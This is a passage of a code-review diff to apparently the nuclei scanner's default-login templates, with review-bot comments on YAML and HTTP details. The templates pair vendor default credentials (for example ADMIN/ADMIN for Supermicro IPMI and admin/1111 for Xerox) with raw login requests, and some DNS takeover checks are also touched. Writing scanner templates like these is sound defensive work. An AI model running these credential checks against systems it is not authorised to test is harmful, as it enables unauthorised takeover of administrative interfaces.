Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}} + + attack: pitchfork + payloads: + user: + - admin + + pass: + - 12345 + + cookie-reuse: true + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - 'token":"(.+?)"' + + matchers-condition: and + matchers: + - type: word + words: + - '"Action":"AdminLogin"' + - '"Result":true' + condition: and + + - type: status + status: + - 200 \ No newline at end of file 
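Review bot: The rainloop template's second request line is `POST /?/Ajax/&q[]=/0/ HTTP/2`, while its first request and every other raw request in this change use `HTTP/1.1`; a raw request is sent as written, so unless the HTTP/2 form has been verified against the raw-request engine it should read `POST /?/Ajax/&q[]=/0/ HTTP/1.1`. The password payload `- 12345` is an unquoted YAML integer; nuclei presumably stringifies it, but quoting it as `- "12345"` removes the implicit typing and protects a future leading-zero PIN from being read as octal. The file is also missing its trailing newline.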
diff --git a/default-logins/rancher/rancher-default-login.yaml b/default-logins/rancher/rancher-default-login.yaml index 9eadc6d68c..53ec21868c 100644 --- a/default-logins/rancher/rancher-default-login.yaml +++ b/default-logins/rancher/rancher-default-login.yaml @@ -4,8 +4,14 @@ info: name: Rancher Default Login author: princechaddha severity: high - description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. - reference: https://github.com/rancher/rancher + description: Rancher default admin credentials were discovered. Rancher is an open-source multi-cluster orchestration platform that lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: + - https://github.com/rancher/rancher + - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,rancher,kubernetes,devops,cloud requests: @@ -50,3 +56,5 @@ requests: part: header regex: - 'Set-Cookie: CSRF=([a-z0-9]+)' + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml index 8e21ee4482..15c37d210c 100644 --- a/default-logins/ricoh/ricoh-weak-password.yaml +++ b/default-logins/ricoh/ricoh-weak-password.yaml 
@@ -1,11 +1,17 @@ -id: ricoh-weak-password +id: ricoh-default-login info: - name: Ricoh Weak Password + name: Ricoh Default Login author: gy741 severity: high + description: Ricoh default admin credentials were discovered. + reference: + - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ricoh,default-login - reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ requests: - raw: @@ -31,3 +37,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/rockmongo/rockmongo-default-login.yaml b/default-logins/rockmongo/rockmongo-default-login.yaml index 8fb0fdf1ee..5e22fa91ad 100644 --- a/default-logins/rockmongo/rockmongo-default-login.yaml +++ b/default-logins/rockmongo/rockmongo-default-login.yaml @@ -4,6 +4,13 @@ info: name: Rockmongo Default Login author: pikpikcu severity: high + description: Rockmongo default admin credentials were discovered. + reference: + - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: rockmongo,default-login requests: @@ -35,3 +42,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/rseenet/rseenet-default-login.yaml b/default-logins/rseenet/rseenet-default-login.yaml new file mode 100644 index 0000000000..a1d7ad8cb3 --- /dev/null +++ b/default-logins/rseenet/rseenet-default-login.yaml 
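Review bot: The ricoh hunk changes `id: ricoh-weak-password` to `id: ricoh-default-login`, but the file remains `default-logins/ricoh/ricoh-weak-password.yaml` (the diff header shows no rename), so the template id and file name now disagree with the id == basename convention the rest of this change follows. Either rename the file to `ricoh-default-login.yaml` in the same commit or keep the old id. Note that changing the id also changes the finding key for anyone de-duplicating or suppressing results by template id, which is worth a line in the commit message.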
@@ -0,0 +1,44 @@ +id: rseenet-default-login + +info: + name: Advantech R-SeeNet Default Login + author: princechaddha + severity: high + description: Advantech R-SeeNet default admin credentials were discovered. R-SeeNet is a software system used for monitoring of status and functions of Advantech routers. + reference: + - https://icr.advantech.cz/products/software/r-seenet + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: rseenet,default-login + +requests: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=login_change&oper=0&username={{user}}&password={{pass}}&submit=Login + + attack: pitchfork + payloads: + user: + - admin + pass: + - conel + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'R-SeeNet (.*)' + + - type: word + part: body + words: + - "User is succesfully logged." + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/samsung/samsung-wlan-default-login.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml index 9b2e264515..a4fcd733ef 100644 --- a/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -4,7 +4,13 @@ info: name: Samsung Wlan AP (WEA453e) Default Login author: pikpikcu severity: high - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + description: Samsung Wlan AP (WEA453e) default root credentials were discovered. + reference: + - https://securityforeveryone.com/tools/samsung-wlan-ap-wea453e-default-credentials-scanner + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: samsung,default-login requests: @@ -33,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 
diff --git a/default-logins/seeddms/seeddms-default-login.yaml b/default-logins/seeddms/seeddms-default-login.yaml index 695086cbe2..9b37bf93bc 100644 --- a/default-logins/seeddms/seeddms-default-login.yaml +++ b/default-logins/seeddms/seeddms-default-login.yaml @@ -1,10 +1,17 @@ id: seeddms-default-login info: - name: SeedDMS Default Credential + name: SeedDMS Default Login author: alifathi-h1 severity: high - reference: https://www.redhat.com/sysadmin/install-seeddms + description: SeedDMS default admin credentials were discovered. + reference: + - https://www.seeddms.org/index.php?id=2 + - https://www.redhat.com/sysadmin/install-seeddms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,seeddms requests: @@ -32,4 +39,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/sequoiadb/sequoiadb-default-login.yaml b/default-logins/sequoiadb/sequoiadb-default-login.yaml new file mode 100644 index 0000000000..6fea4daaf0 --- /dev/null +++ b/default-logins/sequoiadb/sequoiadb-default-login.yaml 
@@ -0,0 +1,51 @@ +id: sequoiadb-default-login + +info: + name: SequoiaDB Default Login + author: dhiyaneshDk + severity: high + description: SequoiaDB default admin credentials were discovered. + reference: + - https://www.sequoiadb.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,sequoiadb + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 + SdbLanguage: en + + cmd=login&user={{username}}&passwd={{md5(password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - contains(tolower(all_headers), 'sdbsessionid') + + - type: word + part: body + words: + - '{ "errno": 0 }' + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/showdoc/showdoc-default-login.yaml b/default-logins/showdoc/showdoc-default-login.yaml index 056d562bcb..597a3657bb 100644 --- a/default-logins/showdoc/showdoc-default-login.yaml +++ b/default-logins/showdoc/showdoc-default-login.yaml @@ -4,8 +4,13 @@ info: name: Showdoc Default Login author: pikpikcu severity: medium + description: Showdoc default credentials were discovered. reference: - https://blog.star7th.com/2016/05/2007.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: showdoc,default-login requests: @@ -36,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/solarwinds/solarwinds-default-login.yaml b/default-logins/solarwinds/solarwinds-default-login.yaml index 421104562e..f2391f8c00 100644 
--- a/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/default-logins/solarwinds/solarwinds-default-login.yaml @@ -4,12 +4,18 @@ info: name: SolarWinds Orion Default Login author: dwisiswant0 severity: high + description: SolarWinds Orion default admin credentials were discovered. + reference: + - https://github.com/solarwinds/OrionSDK/wiki/REST + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: solarwinds,default-login - reference: https://github.com/solarwinds/OrionSDK/wiki/REST - # Optional: - # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 - # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} +# Optional: +# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 +# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} requests: - raw: @@ -43,3 +49,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/spectracom/spectracom-default-login.yaml b/default-logins/spectracom/spectracom-default-login.yaml index 07b09fe30a..f091831f32 100644 --- a/default-logins/spectracom/spectracom-default-login.yaml +++ b/default-logins/spectracom/spectracom-default-login.yaml @@ -3,7 +3,14 @@ id: spectracom-default-login info: name: Spectracom Default Login author: madrobot - severity: medium + severity: high + description: Spectracom default admin credentials were discovered. + reference: + - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: spectracom,default-login requests: @@ -34,3 +41,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 
diff --git a/default-logins/stackstorm/stackstorm-default-login.yaml b/default-logins/stackstorm/stackstorm-default-login.yaml new file mode 100644 index 0000000000..df46febdff --- /dev/null +++ b/default-logins/stackstorm/stackstorm-default-login.yaml @@ -0,0 +1,46 @@ +id: stackstorm-default-login + +info: + name: StackStorm Default Login + author: PaperPen + severity: high + description: A StackStorm default admin login was discovered. + reference: + - https://github.com/StackStorm/st2-docker + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="stackstorm" + tags: stackstorm,default-login + +requests: + - raw: + - | + POST /auth/tokens HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/json + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - st2admin + password: + - Ch@ngeMe + + matchers-condition: and + matchers: + - type: word + words: + - '"user":' + - '"token":' + - '"expiry":' + condition: and + + - type: status + status: + - 201 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/supermicro/supermicro-default-login.yaml b/default-logins/supermicro/supermicro-default-login.yaml new file mode 100644 index 0000000000..14c7e91cd3 --- /dev/null +++ b/default-logins/supermicro/supermicro-default-login.yaml 
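Review bot: The stackstorm raw request sets `Host: {{BaseURL}}`; `BaseURL` expands to the full `scheme://host:port` string and yields an invalid Host header, while every other raw request in this change uses `Host: {{Hostname}}`. Change the line to `Host: {{Hostname}}`. The matcher set is otherwise reasonable — a 201 with `"user":`, `"token":` and `"expiry":` keys is a sound proxy for an accepted Basic credential on `/auth/tokens`. `Ch@ngeMe` is safe as a plain scalar since `@` is only special at the start of a value, but quoting it would make that intent obvious to the next editor.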
@@ -0,0 +1,41 @@ +id: supermicro-default-login + +info: + name: Supermicro Ipmi Default Login + author: For3stCo1d + severity: high + reference: + - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ + tags: supermicro,default-login + +requests: + - raw: + - | + POST /cgi/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name={{user}}&pwd={{pass}} + + attack: pitchfork + payloads: + user: + - ADMIN + - admin + pass: + - ADMIN + - admin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'self.location=' + - '/cgi/url_redirect.cgi?url_name=mainmenu' + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/szhe/szhe-default-login.yaml b/default-logins/szhe/szhe-default-login.yaml index cb6a6fe9b0..c1be8a2077 100644 --- a/default-logins/szhe/szhe-default-login.yaml +++ b/default-logins/szhe/szhe-default-login.yaml @@ -3,10 +3,15 @@ id: szhe-default-login info: name: Szhe Default Login author: pikpikcu - severity: low - tags: szhe,default-login + severity: medium + description: Szhe default login information was discovered. reference: - - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + - https://github.com/Cl0udG0d/SZhe_Scan + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: szhe,default-login requests: - raw: @@ -39,3 +44,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/versa/versa-default-login.yaml b/default-logins/versa/versa-default-login.yaml new file mode 100644 index 0000000000..85af8013e8 --- /dev/null +++ b/default-logins/versa/versa-default-login.yaml 
@@ -0,0 +1,54 @@ +id: versa-default-login + +info: + name: Versa Networks SD-WAN Application Default Login + author: davidmckennirey + severity: high + description: Versa Networks SD-WAN application default admin credentials were discovered. + reference: + - https://versa-networks.com/products/sd-wan.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,versa,sdwan + +requests: + - raw: + - | + GET /versa/login.html HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + - | + POST /versa/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}}&sso=systemRadio + + attack: pitchfork + payloads: + user: + - Administrator + pass: + - versa123 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code_2 == 302' + - "contains(tolower(all_headers_2), 'jsessionid')" + - "contains(tolower(all_headers_2), 'location: /versa/index.html')" + condition: and + + - type: dsl + dsl: + - "contains(tolower(all_headers_2), '/login?error=true')" + - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" + negative: true + +# Enhanced by mp on 2022/04/06 diff --git a/default-logins/vidyo/vidyo-default-login.yaml b/default-logins/vidyo/vidyo-default-login.yaml index a9eb24bbcc..e426b9737b 100644 --- a/default-logins/vidyo/vidyo-default-login.yaml +++ b/default-logins/vidyo/vidyo-default-login.yaml 
@@ -4,11 +4,15 @@ info: name: Vidyo Default Login author: izn0u severity: medium - description: test for default cred super:password - reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 + description: Vidyo default credentials were discovered. + reference: + - https://support.vidyocloud.com/hc/en-us/articles/226265128 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: vidyo,default-login - requests: - raw: - | @@ -58,4 +62,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/default-logins/viewpoint/trilithic-viewpoint-login.yaml b/default-logins/viewpoint/trilithic-viewpoint-login.yaml index d26dd6f456..1ea9daf5b1 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-login.yaml +++ b/default-logins/viewpoint/trilithic-viewpoint-login.yaml @@ -4,8 +4,11 @@ info: name: Trilithic Viewpoint Default Login author: davidmckennirey severity: high - description: | - Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application. + description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,trilithic,viewpoint requests: @@ -36,4 +39,6 @@ requests: - '"authorized":true' - 'redirectUrl' part: body - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/visionhub/visionhub-default-login.yaml b/default-logins/visionhub/visionhub-default-login.yaml index df2983be93..91e0f51048 100644 --- a/default-logins/visionhub/visionhub-default-login.yaml +++ b/default-logins/visionhub/visionhub-default-login.yaml 
@@ -4,9 +4,14 @@ info: name: VisionHub Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on VisionHub application. + description: VisionHub application default admin credentials were accepted. + reference: + - https://www.qognify.com/products/visionhub/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: visionhub,default-login - reference: https://www.qognify.com/products/visionhub/ requests: - raw: @@ -31,4 +36,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/04/06 diff --git a/default-logins/weblogic/weblogic-weak-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml index 272933d9cf..558792b844 100644 --- a/default-logins/weblogic/weblogic-weak-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -1,11 +1,18 @@ id: weblogic-weak-login info: - name: WebLogic weak login + name: WebLogic Default Login author: pdteam severity: high + description: WebLogic default login credentials were discovered. + reference: + - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password + - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,weblogic - reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: @@ -55,4 +62,6 @@ requests: - type: status status: - - 302 \ No newline at end of file + - 302 + +# Enhanced by mp on 2022/04/05 diff --git a/default-logins/wifisky/wifisky-default-login.yaml b/default-logins/wifisky/wifisky-default-login.yaml index c6d731deb0..382c186fed 100644 --- a/default-logins/wifisky/wifisky-default-login.yaml +++ b/default-logins/wifisky/wifisky-default-login.yaml 
@@ -4,6 +4,17 @@ info: name: Wifisky Default Login author: pikpikcu severity: high + description: Wifisky default admin credentials were discovered. + reference: + - https://securityforeveryone.com/tools/wifisky-default-password-scanner + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + shodan-query: title:"WIFISKY-7层流控路由器" + fofa-query: app="WIFISKY-7层流控路由器" tags: default-login,wifisky requests: @@ -42,4 +53,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/wso2/wso2-default-login.yaml b/default-logins/wso2/wso2-default-login.yaml index 9e3fd49b53..098f99704f 100644 --- a/default-logins/wso2/wso2-default-login.yaml +++ b/default-logins/wso2/wso2-default-login.yaml @@ -4,7 +4,14 @@ info: name: WSO2 Management Console Default Login author: cocxanh severity: high - reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console + description: WSO2 Management Console default admin credentials were discovered. + reference: + - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console + - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,wso2 requests: @@ -31,3 +38,5 @@ requests: - "JSESSIONID" part: header condition: and + +# Enhanced by mp on 2022/04/05 diff --git a/default-logins/xerox/xerox7-default-login.yaml b/default-logins/xerox/xerox7-default-login.yaml new file mode 100644 index 0000000000..ae8291f1b4 --- /dev/null +++ b/default-logins/xerox/xerox7-default-login.yaml 
@@ -0,0 +1,53 @@ +id: xerox7-default-login + +info: + name: Xerox WorkCentre 7xxx Printer Default Login + author: MiroslavSotak + severity: high + description: Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered. + reference: + - https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: xerox,default-login + +requests: + - raw: + - | + POST /userpost/xerox.set HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default + + attack: pitchfork + payloads: + username: + - admin + password: + - 1111 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "window.opener.top.location.pathname" + - "Xerox Corporation" + condition: and + + - type: word + part: body + words: + - "invalid" + - "errmsg" + condition: or + negative: true + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index 11e08ec55c..9cf9eadb12 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -4,8 +4,14 @@ info: name: XXL-JOB Default Login author: pdteam severity: high + description: XXL-JOB default admin credentials were discovered. + reference: + - https://github.com/xuxueli/xxl-job + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,xxljob - reference: https://github.com/xuxueli/xxl-job requests: - raw: @@ -42,3 +48,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/14 
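Review bot: The password payload `- 1111` in the new xerox7-default-login template is an unquoted all-digit scalar, so a YAML parser types it as an integer rather than the string the `webPassword` form field needs; nuclei probably stringifies it, but `- "1111"` removes the ambiguity. The negative matcher on `"invalid"`/`"errmsg"` is case-sensitive, so a failure page that says `Invalid` would not be excluded and the template would report a successful login; if the nuclei version in use supports it, add `case-insensitive: true` to that matcher, otherwise list both spellings. The description also has a stray period: `description: Xerox WorkCentre 7xxx printer default admin credentials admin:1111 were discovered.`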
diff --git a/default-logins/zabbix/zabbix-default-login.yaml b/default-logins/zabbix/zabbix-default-login.yaml index 58d665b220..f74389187e 100644 --- a/default-logins/zabbix/zabbix-default-login.yaml +++ b/default-logins/zabbix/zabbix-default-login.yaml @@ -3,7 +3,14 @@ id: zabbix-default-login info: name: Zabbix Default Login author: pdteam - severity: critical + severity: high + description: Zabbix default admin credentials were discovered. + reference: + - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: zabbix,default-login requests: @@ -26,9 +33,12 @@ requests: matchers-condition: and matchers: - type: word + part: header words: - "zabbix.php?action=dashboard.view" - type: status status: - 302 + +# Enhanced by mp on 2022/03/13 diff --git a/default-logins/zmanda/zmanda-default-login.yaml b/default-logins/zmanda/zmanda-default-login.yaml index 0ba28984fa..6716fa3213 100644 --- a/default-logins/zmanda/zmanda-default-login.yaml +++ b/default-logins/zmanda/zmanda-default-login.yaml @@ -4,8 +4,13 @@ info: name: Zmanda Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on Zmanda application. - reference: https://www.zmanda.com + description: Zmanda default admin credentials admin:admin were discovered. + reference: + - https://www.zmanda.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: zmanda,default-login requests: @@ -34,3 +39,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/04 diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index e6de245138..d1beecaf3e 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml 
@@ -1,18 +1,24 @@ id: azure-takeover-detection info: - name: Azure takeover detection + name: Microsoft Azure Takeover Detection author: pdteam severity: high + description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a DNS record points to a deprovisioned Azure resource. + reference: + - https://godiego.co/posts/STO/ + - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + - https://cystack.net/research/subdomain-takeover-chapter-two-azure-services/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-404 tags: dns,takeover,azure - reference: https://godiego.co/posts/STO/ dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 + matchers-condition: and matchers: - type: word @@ -45,3 +51,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml new file mode 100644 index 0000000000..032ddbdd44 --- /dev/null +++ b/dns/caa-fingerprint.yaml @@ -0,0 +1,31 @@ +id: caa-fingerprint + +info: + name: CAA Record + author: pdteam + severity: info + description: A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain. + reference: + - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record + classification: + cwe-id: CWE-200 + tags: dns,caa + +dns: + - name: "{{FQDN}}" + type: CAA + + matchers: + - type: word + words: + - "IN\tCAA" + + extractors: + - type: regex + group: 1 + regex: + - 'issue "(.*)"' + - 'issuewild "(.*)"' + - 'iodef "(.*)"' + +# Enhanced by mp on 2022/03/22 diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml deleted file mode 100644 index d8e4b48d41..0000000000 
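Review bot: The new description in azure-takeover-detection opens with `Microsoft Azure is vulnerable to subdomain takeover attacks`, which misattributes the weakness: what the template finds is a record in the scanned zone that still points at a deprovisioned Azure resource, not a flaw in Azure itself. Suggest `description: A DNS record was discovered that points to a deprovisioned Microsoft Azure resource, which can allow subdomain takeover. This typically happens when organizations create and delete many resources without cleaning up the records that reference them.` The hunk also drops `retries: 3` from the DNS request, so the lookup now relies on nuclei's default retry count; if that default is lower, a transient resolver failure turns into a missed CNAME, which is worth either restoring the value or noting in a comment.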
--- a/dns/can-i-take-over-dns.yaml +++ /dev/null 
@@ -1,140 +0,0 @@ -id: can-i-take-over-dns-fingerprint - -info: - name: Can I Take Over DNS - Fingerprint - author: pdteam - severity: info - tags: dns,ns - reference: https://github.com/indianajson/can-i-take-over-dns - -dns: - - name: "{{FQDN}}" - type: NS - class: inet - recursion: true - retries: 3 - - matchers-condition: or - matchers: - - type: word - name: 000domains - condition: or - words: - - "ns1.000domains.com" - - "ns2.000domains.com" - - "fwns1.000domains.com" - - "fwns2.000domains.com" - - - type: word - name: azure - condition: or - words: - - ".azure-dns.com" - - ".azure-dns.net" - - ".azure-dns.org" - - ".azure-dns.info" - - - type: word - name: bizland - condition: or - words: - - "ns1.bizland.com" - - "ns2.bizland.com" - - - type: word - name: digitalocean - condition: or - words: - - "ns1.digitalocean.com" - - "ns2.digitalocean.com" - - "ns2.digitalocean.com" - - - type: word - name: dnsmadeeasy - words: - - ".dnsmadeeasy.com" - - - type: word - name: dnsimple - condition: or - words: - - "ns1.dnsimple.com" - - "ns2.dnsimple.com" - - "ns3.dnsimple.com" - - "ns4.dnsimple.com" - - - type: word - name: domain - condition: or - words: - - "ns1.domain.com" - - "ns2.domain.com" - - - type: word - name: dotster - condition: or - words: - - "ns1.dotster.com" - - "ns2.dotster.com" - - - type: word - name: easydns - condition: or - words: - - "dns1.easydns.com" - - "dns2.easydns.com" - - "dns3.easydns.com" - - "dns4.easydns.com" - - - type: word - name: googledomains - words: - - ".googledomains.com" - - - type: word - name: hurricane-electric - condition: or - words: - - "ns1.he.net" - - "ns2.he.net" - - "ns3.he.net" - - "ns4.he.net" - - "ns5.he.net" - - - type: word - name: linode - condition: or - words: - - "ns1.linode.com" - - "ns1.linode.com" - - - type: word - name: mydomain - condition: or - words: - - "ns1.mydomain.com" - - "ns2.mydomain.com" - - - type: word - name: name - words: - - ".name.com" - - - type: word - name: nsone - words: - - 
